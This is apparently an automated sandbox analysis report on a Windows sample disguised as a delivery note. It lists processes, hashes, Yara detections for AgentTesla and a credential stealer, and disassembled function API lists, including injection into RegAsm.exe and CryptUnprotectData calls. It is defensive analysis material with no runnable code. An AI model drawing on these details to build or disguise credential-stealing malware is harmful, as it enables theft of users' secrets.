                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                        Imagebase:0x7ff6e3e50000
                                        File size:65440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: RegAsm.exe PID: 2672 Parent PID: 8872

                                        General

                                        Start time:16:32:44
                                        Start date:13/10/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                        Imagebase:0x840000
                                        File size:65440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.5633190528.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 2804 Parent PID: 2672

                                        General

                                        Start time:16:32:44
                                        Start date:13/10/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff710660000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: Delivery note_241493.exe PID: 8872 Parent PID: 7248 Delivery note_241493.exeCOMMON

                                          Executed Functions

                                          Function 00413BE0, Relevance: 110.7, APIs: 59, Strings: 4, Instructions: 479COMMON
                                          Download Yara Rule
                                          APIs
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413C79
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413C98
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000000F8), ref: 00413CBE
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413CD7
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413CF0
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001B4), ref: 00413DA0
                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413DB0
                                          • #606.MSVBVM60(00000001,?), ref: 00413DCD
                                          • __vbaStrMove.MSVBVM60 ref: 00413DD8
                                          • __vbaStrCmp.MSVBVM60(00411058,00000000), ref: 00413DEA
                                          • __vbaFreeStr.MSVBVM60 ref: 00413DF9
                                          • __vbaFreeVar.MSVBVM60 ref: 00413E08
                                          • #706.MSVBVM60(00000001,00000000,00000000), ref: 00413E19
                                          • __vbaStrMove.MSVBVM60 ref: 00413E24
                                          • __vbaNew2.MSVBVM60(00411004,00415590), ref: 00413E3D
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0226004C,00410FF4,00000014), ref: 00413E62
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411014,00000070), ref: 00413E89
                                          • __vbaFreeObj.MSVBVM60 ref: 00413E92
                                          • #580.MSVBVM60(Stalakitter,00000001), ref: 00413E9F
                                          • #574.MSVBVM60(00000002), ref: 00413EB7
                                          • __vbaStrMove.MSVBVM60 ref: 00413EC2
                                          • __vbaStrCmp.MSVBVM60(0041107C,00000000), ref: 00413ECE
                                          • __vbaFreeStr.MSVBVM60 ref: 00413EDD
                                          • __vbaFreeVar.MSVBVM60 ref: 00413EE6
                                          • #594.MSVBVM60(00000002), ref: 00413F01
                                          • __vbaFreeVar.MSVBVM60 ref: 00413F0A
                                          • #648.MSVBVM60(00000002), ref: 00413F16
                                          • __vbaFreeVar.MSVBVM60 ref: 00413F1F
                                          • __vbaVarDup.MSVBVM60 ref: 00413F3B
                                          • #666.MSVBVM60(?,00000002), ref: 00413F49
                                          • __vbaVarMove.MSVBVM60 ref: 00413F55
                                          • __vbaFreeVar.MSVBVM60 ref: 00413F5E
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413F9A
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413FB3
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000000F8), ref: 00413FDD
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410C2C,000006F8), ref: 00414014
                                          • __vbaFreeObj.MSVBVM60 ref: 0041401D
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00414036
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041404F
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,00000130), ref: 00414076
                                          • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00414088
                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00414092
                                          • __vbaStrMove.MSVBVM60 ref: 0041409D
                                          • __vbaFreeStr.MSVBVM60 ref: 004140C4
                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004140D4
                                          • __vbaFreeVar.MSVBVM60 ref: 004140E0
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004140F5
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041410E
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,00000078), ref: 00414138
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410C2C,000006FC), ref: 00414189
                                          • __vbaFreeObj.MSVBVM60 ref: 0041418E
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410BFC,000002B4), ref: 004141AF
                                          • __vbaVarAdd.MSVBVM60(00000002,?,?), ref: 004141DD
                                          • __vbaVarMove.MSVBVM60 ref: 004141E4
                                          • #598.MSVBVM60 ref: 004141EA
                                          • __vbaVarTstLt.MSVBVM60(00000002,?), ref: 00414208
                                          • __vbaFreeVar.MSVBVM60(00414272), ref: 00414261
                                          • __vbaFreeStr.MSVBVM60 ref: 00414266
                                          • __vbaFreeVar.MSVBVM60 ref: 0041426F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __vba$Free$CheckHresult$Move$New2$List$#574#580#594#598#606#648#666#706CallLate
                                          • String ID: $Mallorcinerens$Stalakitter$zk:K&6
                                          • API String ID: 1003127262-3539258339
                                          • Opcode ID: fb9012a9b7921ee2bbdf570e41c1b7a46f8804321f16d06dfe129dfd8e50577b
                                          • Instruction ID: 2771da817462343ba28014306b4faa651393d39e15e1ea5e5a14d5ffd8e3a9a0
                                          • Opcode Fuzzy Hash: fb9012a9b7921ee2bbdf570e41c1b7a46f8804321f16d06dfe129dfd8e50577b
                                          • Instruction Fuzzy Hash: 9B123A70A00219EFDB10DFA5DD88BDEBBB8FF48704F10816AE549A7260DB745A85CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004012B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: #100
                                          • String ID: VB5!6"*
                                          • API String ID: 1341478452-2992194029
                                          • Opcode ID: ad5c034ffb9058339c619adc7bb3e39a77b379a049b8d70b0f235033fd197c52
                                          • Instruction ID: 45bd0d13e4e4182b1e38fa9826e084f0eea559ebe950a83726e08ea8bec5cbf0
                                          • Opcode Fuzzy Hash: ad5c034ffb9058339c619adc7bb3e39a77b379a049b8d70b0f235033fd197c52
                                          • Instruction Fuzzy Hash: 43D0B61698E3C00FE30393B11A265862F700C6366079F04EBD4C2EE0E3C49C18A9C73B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040143D, Relevance: .2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                          • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                                          • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                          • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401679, Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                          • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                                          • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                          • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040162C, Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                          • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                                          • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                          • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413770, Relevance: 40.8, APIs: 27, Instructions: 282COMMON
                                          Download Yara Rule
                                          APIs
                                          • #685.MSVBVM60 ref: 004137C2
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004137D3
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411034,0000001C), ref: 004137F0
                                          • __vbaFreeObj.MSVBVM60 ref: 00413808
                                          • __vbaNew2.MSVBVM60(00411004,00415590), ref: 00413829
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0226004C,00410FF4,00000014), ref: 0041384E
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411014,000000D0), ref: 00413878
                                          • __vbaStrMove.MSVBVM60 ref: 0041388D
                                          • __vbaFreeObj.MSVBVM60 ref: 00413892
                                          • #539.MSVBVM60(?,00000001,00000001,00000001), ref: 004138A2
                                          • __vbaStrVarMove.MSVBVM60(?), ref: 004138AC
                                          • __vbaStrMove.MSVBVM60 ref: 004138B7
                                          • __vbaFreeVar.MSVBVM60 ref: 004138BC
                                          • #568.MSVBVM60(00000063), ref: 004138C4
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004138DD
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004138F6
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411044,00000178), ref: 00413977
                                          • __vbaFreeObj.MSVBVM60 ref: 00413980
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413999
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004139B8
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000000F8), ref: 004139DB
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004139F4
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413A0D
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001B4), ref: 00413AA8
                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413AB8
                                          • __vbaFreeStr.MSVBVM60(00413B00), ref: 00413AF8
                                          • __vbaFreeStr.MSVBVM60 ref: 00413AFD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __vba$Free$CheckHresult$New2$Move$#539#568#685List
                                          • String ID:
                                          • API String ID: 342513763-0
                                          • Opcode ID: 4062e646641915c3c2fe9581579fd7a223b85b310baa66095836b626a5a216cb
                                          • Instruction ID: 46b7b74fbefb11aec07ec8abca4a370cfe5b3f83fd4ed91ab9150128fedc6eb3
                                          • Opcode Fuzzy Hash: 4062e646641915c3c2fe9581579fd7a223b85b310baa66095836b626a5a216cb
                                          • Instruction Fuzzy Hash: D0B14974A00204EFCB10DFA9C989AD9BBF9FF4C700F14816AE509E72A1D7759981CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413400, Relevance: 22.7, APIs: 15, Instructions: 192COMMON
                                          Download Yara Rule
                                          APIs
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413453
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413472
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001B0), ref: 004134B1
                                          • __vbaFreeObj.MSVBVM60 ref: 004134BA
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004134D3
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004134EC
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,00000098), ref: 0041350F
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 00413528
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413541
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001B4), ref: 004135D0
                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004135E0
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004135FC
                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413615
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001A8), ref: 00413638
                                          • __vbaFreeObj.MSVBVM60 ref: 00413641
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __vba$CheckHresultNew2$Free$List
                                          • String ID:
                                          • API String ID: 191279167-0
                                          • Opcode ID: c9814bf8b46120b0649e64c0c88bb76143ad085149ed712300bd1e0d73688651
                                          • Instruction ID: a2bd2282e0936a3ae67f97e022c2bf2a51257d2e9314216f6652aae60ba54125
                                          • Opcode Fuzzy Hash: c9814bf8b46120b0649e64c0c88bb76143ad085149ed712300bd1e0d73688651
                                          • Instruction Fuzzy Hash: A7713A74A00204EFCB10DFA8C989ADABBF8FF4C700B10846AE945E7361D7749941CFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004131E0, Relevance: 22.7, APIs: 15, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                          • #714.MSVBVM60(?,?,00000000), ref: 00413238
                                          • __vbaVarTstNe.MSVBVM60(?,?), ref: 00413254
                                          • __vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 00413267
                                          • __vbaNew2.MSVBVM60(00411004,00415590), ref: 0041328B
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0226004C,00410FF4,00000014), ref: 004132B6
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411014,000000C0), ref: 004132E4
                                          • __vbaFreeObj.MSVBVM60 ref: 004132EF
                                          • __vbaNew2.MSVBVM60(00411004,00415590), ref: 00413304
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0226004C,00410FF4,00000014), ref: 00413329
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411014,000000B8), ref: 0041334F
                                          • __vbaFreeObj.MSVBVM60 ref: 00413354
                                          • __vbaNew2.MSVBVM60(00411004,00415590), ref: 00413369
                                          • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041337F
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0226004C,00410FF4,00000010), ref: 00413399
                                          • __vbaFreeObj.MSVBVM60 ref: 0041339E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __vba$CheckHresult$Free$New2$#714AddrefList
                                          • String ID:
                                          • API String ID: 169271594-0
                                          • Opcode ID: 09625c280e9631241557536d8fc5b052ae55058b09770ef63fe0e2634452116e
                                          • Instruction ID: 7ae62a6344c3a54454090a00e62edea1208f7460db843d065232987866f13041
                                          • Opcode Fuzzy Hash: 09625c280e9631241557536d8fc5b052ae55058b09770ef63fe0e2634452116e
                                          • Instruction Fuzzy Hash: 81515171900209EFDB10DFA5CD85BDEBBB9FB08705F204429E545F32A1D778AA85CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413690, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • __vbaNew2.MSVBVM60(004111EC,00415010), ref: 004136D3
                                          • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 004136EC
                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411024,000001B0), ref: 0041372F
                                          • __vbaFreeObj.MSVBVM60 ref: 00413738
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.999392528.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.999359381.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999504522.0000000000415000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.999532636.0000000000416000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __vba$CheckFreeHresultNew2
                                          • String ID:
                                          • API String ID: 1645334062-0
                                          • Opcode ID: b8248bf81dab8640005362eced54ad9dc81a1f7c8877fc280de6835fb5c108fe
                                          • Instruction ID: 911490bf4439230edc2d1c5686e2a7c72a8a4c7a86aab5f370ef4ebf08e48abd
                                          • Opcode Fuzzy Hash: b8248bf81dab8640005362eced54ad9dc81a1f7c8877fc280de6835fb5c108fe
                                          • Instruction Fuzzy Hash: 131163B4A00305EBC710DFA9CE49BDABBB8FB4C701F108529F545E7790D778A9408BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: RegAsm.exe PID: 2672 Parent PID: 8872 RegAsm.exeCOMMON

                                          Executed Functions

                                          Function 011669A8, Relevance: 5.4, Strings: 2, Instructions: 2890COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: XQm$XQm
                                          • API String ID: 0-2531250672
                                          • Opcode ID: 917c10e68d323e04519c8c7c3bc8e4a74401cb9d684eeed679c4923263d7f79e
                                          • Instruction ID: 4270d6dc76890c68cb6124b5dd1d0cc78c8cf5bff3d48a2faf371e1d5b58bd5d
                                          • Opcode Fuzzy Hash: 917c10e68d323e04519c8c7c3bc8e4a74401cb9d684eeed679c4923263d7f79e
                                          • Instruction Fuzzy Hash: 01632B30D1071A8ECB15DF68C8846ADF7B5FF99304F11D69AE4586B221EB31AAD4CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116DB20, Relevance: 4.3, Strings: 2, Instructions: 1849COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 4'Mm$cMm
                                          • API String ID: 0-2813076591
                                          • Opcode ID: c381839f740ebd34063319bd14e85394e4c29e9aa11c3eadf56f83e10b8152e1
                                          • Instruction ID: 7b6e4192306201fa5cf61e216422010a0dce73602b4232a50f3a682a7d9469eb
                                          • Opcode Fuzzy Hash: c381839f740ebd34063319bd14e85394e4c29e9aa11c3eadf56f83e10b8152e1
                                          • Instruction Fuzzy Hash: 4A133E30D1061A8FCB14EF68C894AADF7B5FF99304F15C699D449AB211EB30AAD5CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011699A8, Relevance: 3.7, Strings: 2, Instructions: 1200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: XQm$XQm
                                          • API String ID: 0-2531250672
                                          • Opcode ID: 2d7883f9ac5714f3f89ee214c8aa3bc524adf6940526fb61336e63501b0fe1f0
                                          • Instruction ID: 0ad0d0cfd5ac00782b1d735888ff2bbb0706cc51ed858e790294806744fcabb7
                                          • Opcode Fuzzy Hash: 2d7883f9ac5714f3f89ee214c8aa3bc524adf6940526fb61336e63501b0fe1f0
                                          • Instruction Fuzzy Hash: B992A334A04389AFD355CF59CC82AD9FFB5EB423E8709466EE40492226CB3A8F34C755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01166A61, Relevance: 2.8, Instructions: 2761COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30af0af0daa8ff1f44aef290e5ca427725888bb3b36a203436cef3cca40ff545
                                          • Instruction ID: b53235d49d1f8dc9576f1c61082305c9acc03154672159a4168dad58dcefd123
                                          • Opcode Fuzzy Hash: 30af0af0daa8ff1f44aef290e5ca427725888bb3b36a203436cef3cca40ff545
                                          • Instruction Fuzzy Hash: DA531C30D1071A8ECB15DF68C8846ADF7B5FF99304F11D69AE4486B221EB71AAD4CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936950, Relevance: 2.5, APIs: 1, Instructions: 955libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2d64b89b9f694572f9971e52e8a016ed8169f5bb0c57ed7e3f51806501ca4bd3
                                          • Instruction ID: dedfee0e4be4b5844c071e7b8481ce67d311eaf5d421fda1306ab5899b76df4f
                                          • Opcode Fuzzy Hash: 2d64b89b9f694572f9971e52e8a016ed8169f5bb0c57ed7e3f51806501ca4bd3
                                          • Instruction Fuzzy Hash: 73A2E7B4A09228CFDB64DF74C88869DBBB6BF48305F2085E9D50AA3355DB349E81CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164EB0, Relevance: 2.3, Strings: 1, Instructions: 1039COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: PHMm
                                          • API String ID: 0-3792969835
                                          • Opcode ID: 2c6f5775b847253898e6f5061e543b34fb2be58df78b6dd0e1a11df53a680ede
                                          • Instruction ID: 11aad2877911f5c7b5c040cfcd003e2e4f2d5b4dcde373d0d2af6ee951ff88d8
                                          • Opcode Fuzzy Hash: 2c6f5775b847253898e6f5061e543b34fb2be58df78b6dd0e1a11df53a680ede
                                          • Instruction Fuzzy Hash: 9F82CF30B042048FDB49DBB8C998A6EBBF7AF85354F118969E506DB3A1DB35DC02CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01150A09, Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01150A75
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: CryptDataUnprotect
                                          • String ID:
                                          • API String ID: 834300711-0
                                          • Opcode ID: b3fa1dc49524927edee0650c43fce0a4f2d6000deea449a0b90d5800a316a671
                                          • Instruction ID: 81693195b370ecf86e78e18648819f91abad5984645da28e304d8fdad8c6bfc5
                                          • Opcode Fuzzy Hash: b3fa1dc49524927edee0650c43fce0a4f2d6000deea449a0b90d5800a316a671
                                          • Instruction Fuzzy Hash: 19211272800249DFCB10CF99C945BDEBFF4EF48324F14885AEA24A7210C739A954DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01150280, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01150A75
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: CryptDataUnprotect
                                          • String ID:
                                          • API String ID: 834300711-0
                                          • Opcode ID: 736693ec84ffc258f0ccab2fa24cd499705bd5cfc6781fc401ce6ddf013288c0
                                          • Instruction ID: 272ead2d9a649bdcab5d078a48b46447bfb033b2fc37b6a76f9237c14025681b
                                          • Opcode Fuzzy Hash: 736693ec84ffc258f0ccab2fa24cd499705bd5cfc6781fc401ce6ddf013288c0
                                          • Instruction Fuzzy Hash: DA112672800209DFDB10CFD9C945BEEBBF4EF48324F148819EA14A7211C779A950DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116C7D0, Relevance: .7, Instructions: 683COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8bc65f4069f0cc4aaa9d4d8e87891a671f135635af0b13bbfe103f4740f9ce9
                                          • Instruction ID: f1fc636495e9286ef3adf99855e2a31b363c82d74ef38a83365b4618adce9b95
                                          • Opcode Fuzzy Hash: c8bc65f4069f0cc4aaa9d4d8e87891a671f135635af0b13bbfe103f4740f9ce9
                                          • Instruction Fuzzy Hash: BF32D330B002148FDB18DBB8C854BAEB7FAAFC9214F158869D545EB395DB35EC418BD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

